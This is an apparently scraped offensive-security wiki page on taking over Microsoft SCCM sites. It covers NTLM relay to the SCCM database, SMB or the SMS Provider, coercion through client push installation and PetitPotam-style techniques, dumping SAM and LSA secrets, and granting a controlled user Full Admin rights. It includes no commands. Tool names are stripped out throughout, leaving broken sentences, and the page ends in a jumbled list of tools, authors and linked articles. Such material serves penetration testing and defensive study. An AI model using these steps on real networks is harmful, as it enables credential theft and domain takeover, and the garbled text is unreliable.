If the NTLM relay attack is a success and was targeting the MS-SQL service with SOCKS support, an SQL console could be obtained on the SCCM database through the opened socks proxy. From UNIX-like systems, 's (Python) can be used for that purpose.

The target of the must be set to the SMS Provider server, on the HTTP/S service (port 80/tcp or 443/tcp).

From UNIX-like systems, on 's (Python) script can be used for that purpose.

From Windows systems, (Powershell) can be used as an alternative to 's , however it doesn't feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.

Fore more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: .

The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with (C#). For more information, see the corresponding article "" by . Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (, , , , etc.).

From UNIX-like systems, authentication can be coerced through , , , , etc. (not based on triggering the client push installation).

The target of the must be set to the active site server, on the SMB service.

From UNIX-like systems, 's (Python) script can be used for that purpose.

From Windows systems, (Powershell) can be used as an alternative to 's , however it doesn't feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.

Fore more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: .

The passive site server's authentication can be coerced with (, , , , etc.).

Through the socks session, it is possible to dump the local credentials stored in the SAM database, and the secrets from the LSA, with 's (Python).

Since the active site server must be a member of the SMS Provider administrators (it is member of the SMS Admins group), its credentials can be used to add a new controlled user to the Full Admin SCCM group. (Python) can be used for this purpose.

The tool author () warns that is a PoC only tested in lab. One should be careful when running in production environments.

NTLM capture
Garrett Foster
article
this blog
SystemDPAPIdump.py
Adam Chester
SharpSCCM
sccmwtf
sccmhunter
Adam Chester
sccmhunter
SharpSCCM
SharpDPAPI
Mimikatz
sccmhunter
SharpSCCM
sccmhunter
SharpSCCM
pxethiefy.py
pxethiefy.py
hashcat module
PXEThief
PXEThief
hashcat module
this blog
SCCM Topology
Microsoft.com
SCCM Site Takeover via Automatic Client Push Installation
Chris Thompson
Site Takeover via SCCM’s AdminService API
Garrett Foster
client push installation
KB15599094
client push installation coercion technique
rpcclient
lookupsid
impacket
SharpSCCM
NTLM relay attack
Impacket
ntlmrelayx.py
Inveigh-Relay
Impacket
ntlmrelayx.py
NTLM Relay
SharpSCCM
Coercing NTLM authentication from SCCM
Chris Thompson
PrinterBug
PetitPotam
ShadowCoerce
DFSCoerce
PrinterBug
PetitPotam
ShadowCoerce
DFSCoerce
Impacket
mssqlclient
NTLM relay attack
this PR
Impacket
ntlmrelayx.py
Inveigh-Relay
Impacket
ntlmrelayx.py
NTLM Relay
SharpSCCM
Coercing NTLM authentication from SCCM
Chris Thompson
PrinterBug
PetitPotam
ShadowCoerce
DFSCoerce
PrinterBug
PetitPotam
ShadowCoerce
DFSCoerce
NTLM relay attack
Impacket
ntlmrelayx.py
Inveigh-Relay
Impacket
ntlmrelayx.py
NTLM Relay
PrinterBug
PetitPotam
ShadowCoerce
DFSCoerce
Impacket
secretsdump.py
sccmhunter
Chris Thompson
SharpSCCM
LogoActive Directory Spotlight: Attacking The Microsoft Configuration Manager (SCCM/MECM)sse_gmbh
LogoPush Comes To Shove: exploring the attack surface of SCCM Client Push AccountsTrimarc Content Hub
LogoThe Phantom Credentials of SCCM: Why the NAA Won’t DieMedium
Logo@_xpn_ - Exploring SCCM by Unobfuscating Network Access AccountsXPN InfoSec Blog
LogoSCCM Site Takeover via Automatic Client Push InstallationMedium
LogoCoercing NTLM Authentication from SCCMMedium
LogoSite Takeover via SCCM’s AdminService APIPosts By SpecterOps Team Members
LogoSCCM Hierarchy Takeover with High AvailabilityPosts By SpecterOps Team Members